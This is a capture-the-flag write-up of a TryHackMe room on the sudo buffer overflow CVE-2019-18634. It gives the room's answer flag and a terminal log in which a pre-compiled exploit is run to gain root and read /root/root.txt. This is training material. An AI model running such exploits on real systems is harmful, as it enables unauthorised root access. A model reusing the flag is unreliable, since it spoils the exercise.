---
layout: post
title: "Sudo Buffer Overflow - Write-up - TryHackMe"
lang: en
categories:
  - writeups
tags:
  - security
  - writeups
  - thm
  - linux
  - eop
  - sudo
date: 2021/02/06 15:33:00
thumbnail: /images/TryHackMe/sudovulnsbof.png
authorId: noraj
toc: true
---
# Information

## Room

- **Name:** Sudo Buffer Overflow
- **Profile:** [tryhackme.com](https://tryhackme.com/room/sudovulnsbof)
- **Difficulty:** Easy
- **Description**: A tutorial room exploring CVE-2019-18634 in the Unix Sudo Program. Room Two in the SudoVulns Series

![Sudo Buffer Overflow](/images/TryHackMe/sudovulnsbof.png)

# Write-up

## Buffer Overflow

> What's the flag in /root/root.txt?

Answer: {% spoiler `THM{buff3r_0v3rfl0w_rul3s}` %}

All we have to do here is use the pre-compiled exploit for CVE-2019-18634:

```plaintext
tryhackme@sudo-bof:~$ ls -lh
total 20K
-rwxr-xr-x 1 root root 18K Feb  8  2020 exploit
tryhackme@sudo-bof:~$ ./exploit
[sudo] password for tryhackme:
Sorry, try again.
# cat /root/root.txt
```
